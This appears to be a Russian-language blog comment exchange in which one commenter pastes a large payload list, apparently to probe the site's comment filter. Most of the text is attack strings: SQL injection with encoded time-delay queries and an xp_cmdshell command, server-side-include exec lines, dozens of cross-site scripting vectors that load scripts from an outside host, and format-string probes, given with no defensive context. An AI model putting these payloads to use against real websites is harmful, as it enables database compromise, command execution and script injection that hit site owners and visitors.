бугога, какие мы дерзкие )) про кофеварку ты писал, конечно ) и за речью мы следим и ддоса мы не боимся, конечно )
Может хватит мне засорять фильтр всякой хренью? Это было просто бест - все XSS в одном комменте! Code: === SQL Injection Statements === ’sqlvuln ‘+sqlvuln sqlvuln; (sqlvuln) a’ or 1=1– a” or 1=1– ” or “a” = “a a’ or ‘a’ = ‘a 1 or 1=1 a’ waitfor delay ‘0:0:10′– 1 waitfor delay ‘0:0:10′– declare @q nvarchar (4000) select @q = 0×770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0×77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (4000) select @q = 0×730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0×73656c65637420404076657273696f6e exec(@s) a’ ? ‘ or 1=1 ‘ or 1=1 – x’ AND userid IS NULL; – x’ AND email IS NULL; – anything’ OR ‘x’='x x’ AND 1=(SELECT COUNT(*) FROM tabname); – x’ AND members.email IS NULL; – x’ OR full_name LIKE ‘%Bob% 23 OR 1=1 ‘; exec master..xp_cmdshell ‘ping 172.10.1.255′– === SSI (Server Side Includes) Statements === <!–#exec cmd=”mail Foobar@email.de == XSS Statements - Most effective/most common statements === Testing Statements ‘;alert(String.fromCharCode(88,83,83))//\’;alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))//\”;alert(String.fromCharCode(88,83,83))//–>”>’>alert(String.fromCharCode(88,83,83)) ”;!–”= Common exploit code (covers a lot of XSS vulnerabilities) ‘>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83)); === XSS Statements - Full List === alert(”XSS”)”> perl -e ‘print “”;’ > out perl -e ‘print “alert(\”XSS\”)”;’ > out <alert(”XSS”);//< <SCRIPT SRC=http://ha.ckers.org/xss.js? <IMG SRC=”:alert(’XSS’)” <iframe src=http://ha.ckers.org/scriptlet.html < a=/XSS/\nalert(a.source) \”;alert(’XSS’);// alert(”XSS”); @import’http://ha.ckers.org/xss.css’; <META HTTP-EQUIV=”Link” Content=”; REL=stylesheet”> BODY{-moz-binding:url(”http://ha.ckers.org/xssmoz.xml#xss”)} li {list-style-image: url(”:alert(’XSS’)”);}XSS ¼script¾alert(¢XSS¢)¼/script¾ @im\port’\ja\vasc\ript:alert(”XSS”)’; exp/* alert(’XSS’); .XSS{background-image:url(”:alert(’XSS’)”);} BODY{background:url(”:alert(’XSS’)”)} XSS <![CDATA[]]> <IMG SRC=”javascript:alert(’XSS’)”> <!–#exec cmd=”/bin/echo ‘ <? echo(’alert(”XSS”)’); ?> +ADw-SCRIPT+AD4-alert(’XSS’);+ADw-/SCRIPT+AD4- ” SRC=”http://ha.ckers.org/xss.js”> ” SRC=”http://ha.ckers.org/xss.js”> ” ” SRC=”http://ha.ckers.org/xss.js”> ‘” SRC=”http://ha.ckers.org/xss.js”> ` SRC=”http://ha.ckers.org/xss.js”> ‘>” SRC=”http://ha.ckers.org/xss.js”> document.write(”<SCRI”);PT SRC=”http://ha.ckers.org/xss.js”> XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS XSS <a href=”about:document.write(”XSS-XSS-XSS”);”> document.write(”XSS-XSS-XSS”); <!–document.write(”XSS-XSS-XSS”);//–> <![CDATA[document.write(”XSS-XSS-XSS”); <document.write(”XSS-XSS-XSS”); ” onmouseover=”document.write(”XSS-XSS-XSS”);”> <script>document.write(”XSS-XSS-XSS”);</script>; &document.write(”XSS-XSS-XSS”); <a href=”about:document.write(”XSS-XSS-XSS”);”> [Mozilla] document.write(”XSS-XSS-XSS”); <!–document.write(”XSS-XSS-XSS”);//–> <![CDATA[ document.write(”XSS-XSS-XSS”); <document.write(”XSS-XSS-XSS”); ” onmouseover=”document.write(”XSS-XSS-XSS”);”> <script>document.write(”XSS-XSS-XSS”);</script>; [\xC0][\xBC]script>document.write(”XSS-XSS-XSS”);[\xC0][\xBC]/script> === Format String Statements === %s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s